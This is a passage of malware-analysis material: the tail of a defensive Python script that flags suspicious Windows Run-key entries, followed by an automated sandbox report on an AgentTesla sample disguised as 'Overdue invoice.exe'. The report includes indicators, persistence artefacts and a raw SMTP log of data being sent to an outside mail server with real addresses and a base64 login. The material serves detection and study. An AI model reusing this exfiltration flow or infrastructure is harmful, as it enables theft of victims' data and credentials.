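    for hname, hive in hives.items():
        for vname, view in views.items():
            for sub in RUN_KEYS:
                try:
                    key = winreg.OpenKey(hive, sub, 0, winreg.KEY_READ | view)
                except OSError:
                    continue
                with key:
                    i = 0
                    while True:
                        try:
                            name, data, _ = winreg.EnumValue(key, i)
                        except OSError:
                            break
                        out.append(Entry(hname + vname, sub, name, str(data)))
                        i += 1
    return out


# Constructed environment and entries; only the yqWDN line is from the report.
SAMPLE_ENV = {"APPDATA": r"C:\Users\user\AppData\Roaming",
              "LOCALAPPDATA": r"C:\Users\user\AppData\Local",
              "PROGRAMFILES": r"C:\Program Files"}
SAMPLE_ENTRIES = [
    Entry("HKCU", RUN_KEYS[0], "yqWDN", r"C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"),
    Entry("HKCU", RUN_KEYS[0], "OneDrive",
          r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    Entry("HKLM64", RUN_KEYS[0], "SecurityHealth", r"%ProgramFiles%\Windows Defender\MSASCuiL.exe"),
    Entry("HKCU", RUN_KEYS[0], "Updater", r"%APPDATA%\Foo\upd.exe -silent"),
]

if __name__ == "__main__":
    on_windows = sys.platform == "win32"
    entries = read_run_keys() if on_windows else SAMPLE_ENTRIES
    env = dict(os.environ) if on_windows else SAMPLE_ENV
    for f in classify(entries, env):
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{flag:10} {f.entry.hive}\\{f.entry.key}  {f.entry.name} -> {f.image}  ({f.reason})")
```

On the sample list the yqWDN entry is flagged for the same reason the report's own line stands out: a Run value executing from AppData\Roaming. The constructed OneDrive entry is flagged too, which is the expected false positive for this heuristic and why the finding is an input to allow-listing rather than a verdict; the Program Files entry passes.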
Match | Associated Sample Name / URL | Detection | Context
206.183.111.188 | statement of account.exe | malicious |
206.183.111.188 | Request Quotation.exe | malicious |
206.183.111.188 | statement of account.exe | malicious |
206.183.111.188 | BANK slip.exe | malicious |
206.183.111.188 | invoice.exe | malicious |
206.183.111.188 | NEW QUOTATION ENQUIRY.exe | malicious |
206.183.111.188 | Statement of Account.exe | malicious |
206.183.111.188 | new order 20211029.exe | malicious |
206.183.111.188 | SOA.exe | malicious |
206.183.111.188 | purchase order pdf.exe | malicious |
206.183.111.188 | payment infirmation.exe | malicious |
Match | Associated Sample Name / URL | Detection | Context
mail.jkudyog.com | statement of account.exe | malicious | 206.183.111.188
mail.jkudyog.com | Request Quotation.exe | malicious | 206.183.111.188
mail.jkudyog.com | statement of account.exe | malicious | 206.183.111.188
mail.jkudyog.com | BANK slip.exe | malicious | 206.183.111.188
mail.jkudyog.com | soa.exe | malicious | 206.183.111.188
mail.jkudyog.com | invoice.exe | malicious | 206.183.111.188
mail.jkudyog.com | NEW QUOTATION ENQUIRY.exe | malicious | 206.183.111.188
mail.jkudyog.com | Statement of Account.exe | malicious | 206.183.111.188
mail.jkudyog.com | new order 20211029.exe | malicious | 206.183.111.188
mail.jkudyog.com | SOA.exe | malicious | 206.183.111.188
mail.jkudyog.com | SOA.exe | malicious | 206.183.111.188
mail.jkudyog.com | purchase order pdf.exe | malicious | 206.183.111.188
mail.jkudyog.com | payment infirmation.exe | malicious | 206.183.111.188
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        WEBWERKS-AS-INWebWerksIndiaPvtLtdINhttps://oscarwilliams.net/re/1665.phpGet hashmaliciousBrowse
                                                                        • 103.251.94.111
                                                                        Kn7vI9IYMc3QOV4.exeGet hashmaliciousBrowse
                                                                        • 43.241.37.192
                                                                        https://www.3pumphouse.com/?gclid=EAIaIQobChMIlab2mvPr9wIVD-G7CB3y0goCEAEYASAAEgJ2fvD_BwEGet hashmaliciousBrowse
                                                                        • 103.86.176.137
                                                                        PO087-Uhhgyauag98-Ybsysgbuygayuu.htmGet hashmaliciousBrowse
                                                                        • 180.149.241.244
                                                                        GlKt2OVVbMGet hashmaliciousBrowse
                                                                        • 103.118.12.141
                                                                        xd.arm7Get hashmaliciousBrowse
                                                                        • 103.118.12.103
                                                                        statement of account.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        wfXXHrVoiOGet hashmaliciousBrowse
                                                                        • 43.241.39.126
                                                                        Request Quotation.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        6DUDXXCuW8.exeGet hashmaliciousBrowse
                                                                        • 103.212.121.91
                                                                        statement of account.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        61qmScKTMK.exeGet hashmaliciousBrowse
                                                                        • 103.212.121.91
                                                                        nL63S1iE3iGet hashmaliciousBrowse
                                                                        • 103.118.12.144
                                                                        lAaP4XA5wBGet hashmaliciousBrowse
                                                                        • 43.241.39.151
                                                                        FIR COPY.SCR.exeGet hashmaliciousBrowse
                                                                        • 103.224.240.69
                                                                        7QU8r8CWACGet hashmaliciousBrowse
                                                                        • 103.118.12.135
                                                                        FIR.exeGet hashmaliciousBrowse
                                                                        • 103.224.240.69
                                                                        9KYaTfGxCCGet hashmaliciousBrowse
                                                                        • 43.241.39.185
                                                                        BANK slip.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        adjunto 07032022.xlsmGet hashmaliciousBrowse
                                                                        • 103.251.24.104
                                                                        No context
                                                                        No context
Process: C:\Users\user\Desktop\Overdue invoice.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5: 69206D3AF7D6EFD08F4B4726998856D3
SHA1: E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256: A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512: CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious: true
Reputation: high, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
Process: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5: 69206D3AF7D6EFD08F4B4726998856D3
SHA1: E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256: A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512: CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious: false
Reputation: high, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
Process: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1645
Entropy (8bit): 5.196427141159646
Encrypted: false
SSDEEP: 24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBNixYtn:cbh47TlNQ//rydbz9I3YODOLNdq3SQ
MD5: 364FC5EE0A5C3367CC852041FF7A5AF8
SHA1: 2F039FE567DB11CEC74B020B1DC57E7BD20B8CC2
SHA-256: 8037DD1DC6177AFE6038B4A78C79274F4DFFF4A96098ACE279B12517F607EEB8
SHA-512: AA980A773C0DC2E154EB1D060F3D90F05814E74BCE492C50DC2904D73724BC18ADF7677C127CEF0B98230856AEF47B42E39CE43293B7F7E28A77CEE9DD7980E4
Malicious: false
                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
Process: C:\Users\user\Desktop\Overdue invoice.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1645
Entropy (8bit): 5.196427141159646
Encrypted: false
SSDEEP: 24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBNixYtn:cbh47TlNQ//rydbz9I3YODOLNdq3SQ
MD5: 364FC5EE0A5C3367CC852041FF7A5AF8
SHA1: 2F039FE567DB11CEC74B020B1DC57E7BD20B8CC2
SHA-256: 8037DD1DC6177AFE6038B4A78C79274F4DFFF4A96098ACE279B12517F607EEB8
SHA-512: AA980A773C0DC2E154EB1D060F3D90F05814E74BCE492C50DC2904D73724BC18ADF7677C127CEF0B98230856AEF47B42E39CE43293B7F7E28A77CEE9DD7980E4
Malicious: true
                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
Process: C:\Users\user\Desktop\Overdue invoice.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 731648
Entropy (8bit): 7.384642302436539
Encrypted: false
SSDEEP: 12288:/52iNKUwVRh6UkRKstKDBi3x0Z5S2EetsSJhjsudQVYJUEKl75jQWmc:x18Ph6UkgstKFkYS270u2VYJUEKlCW
MD5: 21C2F8CC3F1D71FFB036CA3788A346B6
SHA1: B1F681EB0C5B406BAD2414829D003568AB44982C
SHA-256: 8E68AC628396CBB8619A54FFCE8AEDAE2A20CA23E514813B70C99987175F735D
SHA-512: 4A6BE00ECBE056B5951926A87529A0993D5902841BB491460F8F6EAE1AAB017FF4EE2E8AF3C604AE0540C14B56751F517554AFC863918AB92362B3339A3CE406
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 60%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b.....................H........... ........@.. ....................................@.................................@...W........E...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....E.......F..................@..@.reloc.......`.......(..............@..B................|.......H.......P....R......B....y...1..........................................z.(".....}.....(#...o$...}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....o....*..{....*.s%.
Process: C:\Users\user\Desktop\Overdue invoice.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
                                                                        Preview:[ZoneTransfer]....ZoneId=0
Process: C:\Users\user\Desktop\Overdue invoice.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 835
Entropy (8bit): 4.694294591169137
Encrypted: false
SSDEEP: 24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
MD5: 6EB47C1CF858E25486E42440074917F2
SHA1: 6A63F93A95E1AE831C393A97158C526A4FA0FAAE
SHA-256: 9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
SHA-512: 08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
Malicious: true
                                                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.384642302436539
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: Overdue invoice.exe
File size: 731648
MD5: 21c2f8cc3f1d71ffb036ca3788a346b6
SHA1: b1f681eb0c5b406bad2414829d003568ab44982c
SHA256: 8e68ac628396cbb8619a54ffce8aedae2a20ca23e514813b70c99987175f735d
SHA512: 4a6be00ecbe056b5951926a87529a0993d5902841bb491460f8f6eae1aab017ff4ee2e8af3c604ae0540c14b56751f517554afc863918ab92362b3339a3ce406
SSDEEP: 12288:/52iNKUwVRh6UkRKstKDBi3x0Z5S2EetsSJhjsudQVYJUEKl75jQWmc:x18Ph6UkgstKFkYS270u2VYJUEKlCW
TLSH: 75F4CF20F71FB8D1D66EC6740BB686221EA14D7EFCF9921E5597314B0A31392601BCAF
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.....................H........... ........@.. ....................................@................................
Icon Hash: 04fcf0b0d4a6e46c
Entrypoint: 0x47fe9a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x628EC311 [Thu May 26 00:00:17 2022 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x7fe40          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x80000          0x345bc       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb6000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x7dea0       0x7e000   False     0.818219866071   data       7.65168574947   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x80000          0x345bc       0x34600   False     0.445009509248   data       6.26427887157   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xb6000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size     Type                                                                                                                                         Language  Country
RT_ICON        0x802b0  0xc5d8   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON        0x8c888  0x10828  dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON        0x9d0b0  0x94a8   data
RT_ICON        0xa6558  0x5488   data
RT_ICON        0xab9e0  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
RT_ICON        0xafc08  0x25a8   data
RT_ICON        0xb21b0  0x10a8   data
RT_ICON        0xb3258  0x988    data
RT_ICON        0xb3be0  0x468    GLS_BINARY_LSB_FIRST
RT_GROUP_ICON  0xb4048  0x84     data
RT_VERSION     0xb40cc  0x33c    data
RT_MANIFEST    0xb4408  0x1b4    XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
DLL          Import
mscoree.dll  _CorExeMain
Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2015
Assembly Version  1.0.0.0
InternalName      cCjl.exe
FileVersion       1.0.0.0
CompanyName       FCSF
LegalTrademarks
Comments
ProductName       Event Transmission
ProductVersion    1.0.0.0
FileDescription   Event Transmission
OriginalFilename  cCjl.exe
Timestamp                 Protocol  SID      Message                                                             Source Port  Dest Port  Source IP    Dest IP
05/27/22-12:53:52.919110  TCP       2840032  ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2  49715        587        192.168.2.3  206.183.111.188
05/27/22-12:53:52.919010  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP                                 49715        587        192.168.2.3  206.183.111.188
05/27/22-12:54:26.668198  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP                                 49745        587        192.168.2.3  206.183.111.188
05/27/22-12:53:52.919010  TCP       2839723  ETPRO TROJAN Win32/Agent Tesla SMTP Activity                        49715        587        192.168.2.3  206.183.111.188
05/27/22-12:54:26.668311  TCP       2840032  ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2  49745        587        192.168.2.3  206.183.111.188
05/27/22-12:54:26.668198  TCP       2839723  ETPRO TROJAN Win32/Agent Tesla SMTP Activity                        49745        587        192.168.2.3  206.183.111.188
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
May 27, 2022 12:53:49.667876959 CEST  49316        53         192.168.2.3  8.8.8.8
May 27, 2022 12:53:50.838224888 CEST  49316        53         192.168.2.3  8.8.8.8
May 27, 2022 12:53:50.942549944 CEST  53           49316      8.8.8.8      192.168.2.3
May 27, 2022 12:54:22.740289927 CEST  58116        53         192.168.2.3  8.8.8.8
May 27, 2022 12:54:22.844952106 CEST  53           58116      8.8.8.8      192.168.2.3
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class
May 27, 2022 12:53:49.667876959 CEST  192.168.2.3  8.8.8.8  0xb85e    Standard query (0)  mail.jkudyog.com  A (IP address)  IN (0x0001)
May 27, 2022 12:53:50.838224888 CEST  192.168.2.3  8.8.8.8  0xb85e    Standard query (0)  mail.jkudyog.com  A (IP address)  IN (0x0001)
May 27, 2022 12:54:22.740289927 CEST  192.168.2.3  8.8.8.8  0xf7d3    Standard query (0)  mail.jkudyog.com  A (IP address)  IN (0x0001)
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name              CName  Address          Type            Class
May 27, 2022 12:53:50.942549944 CEST  8.8.8.8    192.168.2.3  0xb85e    No error (0)  mail.jkudyog.com         206.183.111.188  A (IP address)  IN (0x0001)
May 27, 2022 12:54:22.844952106 CEST  8.8.8.8    192.168.2.3  0xf7d3    No error (0)  mail.jkudyog.com         206.183.111.188  A (IP address)  IN (0x0001)
Timestamp                             Source Port  Dest Port  Source IP        Dest IP          Commands
May 27, 2022 12:53:51.877722979 CEST  587          49715      206.183.111.188  192.168.2.3      220-hulk.rapidns.com ESMTP Exim 4.95 #2 Fri, 27 May 2022 16:23:51 +0530
                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                220 and/or bulk e-mail.
May 27, 2022 12:53:51.957850933 CEST  49715        587        192.168.2.3      206.183.111.188  EHLO 701188
May 27, 2022 12:53:52.088825941 CEST  587          49715      206.183.111.188  192.168.2.3      250-hulk.rapidns.com Hello 701188 [102.129.143.42]
                                                                                                250-SIZE 52428800
                                                                                                250-8BITMIME
                                                                                                250-PIPELINING
                                                                                                250-PIPE_CONNECT
                                                                                                250-AUTH PLAIN LOGIN
                                                                                                250-STARTTLS
                                                                                                250 HELP
May 27, 2022 12:53:52.178985119 CEST  49715        587        192.168.2.3      206.183.111.188  AUTH login YXNodXRvc2hAamt1ZHlvZy5jb20=
May 27, 2022 12:53:52.310087919 CEST  587          49715      206.183.111.188  192.168.2.3      334 UGFzc3dvcmQ6
May 27, 2022 12:53:52.507563114 CEST  587          49715      206.183.111.188  192.168.2.3      235 Authentication succeeded
May 27, 2022 12:53:52.508352995 CEST  49715        587        192.168.2.3      206.183.111.188  MAIL FROM:<ashutosh@jkudyog.com>
May 27, 2022 12:53:52.638927937 CEST  587          49715      206.183.111.188  192.168.2.3      250 OK
May 27, 2022 12:53:52.639225006 CEST  49715        587        192.168.2.3      206.183.111.188  RCPT TO:<markhung@jingtai.com.vn>
May 27, 2022 12:53:52.786659956 CEST  587          49715      206.183.111.188  192.168.2.3      250 Accepted
May 27, 2022 12:53:52.786880970 CEST  49715        587        192.168.2.3      206.183.111.188  DATA
May 27, 2022 12:53:52.917664051 CEST  587          49715      206.183.111.188  192.168.2.3      354 Enter message, ending with "." on a line by itself
May 27, 2022 12:53:52.919720888 CEST  49715        587        192.168.2.3      206.183.111.188  .
May 27, 2022 12:53:53.054867029 CEST  587          49715      206.183.111.188  192.168.2.3      250 OK id=1nuXbN-000NU7-4h
May 27, 2022 12:54:25.429943085 CEST  587          49745      206.183.111.188  192.168.2.3      220-hulk.rapidns.com ESMTP Exim 4.95 #2 Fri, 27 May 2022 16:24:25 +0530
                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                220 and/or bulk e-mail.
May 27, 2022 12:54:25.444358110 CEST  49745        587        192.168.2.3      206.183.111.188  EHLO 701188
May 27, 2022 12:54:25.578612089 CEST  587          49745      206.183.111.188  192.168.2.3      250-hulk.rapidns.com Hello 701188 [102.129.143.42]
                                                                                                250-SIZE 52428800
                                                                                                250-8BITMIME
                                                                                                250-PIPELINING
                                                                                                250-PIPE_CONNECT
                                                                                                250-AUTH PLAIN LOGIN
                                                                                                250-STARTTLS
                                                                                                250 HELP
May 27, 2022 12:54:25.582864046 CEST  49745        587        192.168.2.3      206.183.111.188  AUTH login YXNodXRvc2hAamt1ZHlvZy5jb20=
May 27, 2022 12:54:25.717389107 CEST  587          49745      206.183.111.188  192.168.2.3      334 UGFzc3dvcmQ6
May 27, 2022 12:54:25.893343925 CEST  587          49745      206.183.111.188  192.168.2.3      235 Authentication succeeded
May 27, 2022 12:54:25.893627882 CEST  49745        587        192.168.2.3      206.183.111.188  MAIL FROM:<ashutosh@jkudyog.com>
May 27, 2022 12:54:26.028583050 CEST  587          49745      206.183.111.188  192.168.2.3      250 OK
May 27, 2022 12:54:26.028840065 CEST  49745        587        192.168.2.3      206.183.111.188  RCPT TO:<markhung@jingtai.com.vn>
May 27, 2022 12:54:26.177023888 CEST  587          49745      206.183.111.188  192.168.2.3      250 Accepted
May 27, 2022 12:54:26.500936985 CEST  49745        587        192.168.2.3      206.183.111.188  DATA
May 27, 2022 12:54:26.634953022 CEST  587          49745      206.183.111.188  192.168.2.3      354 Enter message, ending with "." on a line by itself
May 27, 2022 12:54:26.668456078 CEST  49745        587        192.168.2.3      206.183.111.188  .
May 27, 2022 12:54:26.809715033 CEST  587          49745      206.183.111.188  192.168.2.3      250 OK id=1nuXbu-000NXK-Rm
May 27, 2022 12:55:29.490083933 CEST  49715        587        192.168.2.3      206.183.111.188  QUIT
May 27, 2022 12:55:29.823596954 CEST  587          49715      206.183.111.188  192.168.2.3      221 hulk.rapidns.com closing connection

                                                                        Target ID:0
                                                                        Start time:12:53:16
                                                                        Start date:27/05/2022
                                                                        Path:C:\Users\user\Desktop\Overdue invoice.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\Overdue invoice.exe"
                                                                        Imagebase:0x520000
                                                                        File size:731648 bytes
                                                                        MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low

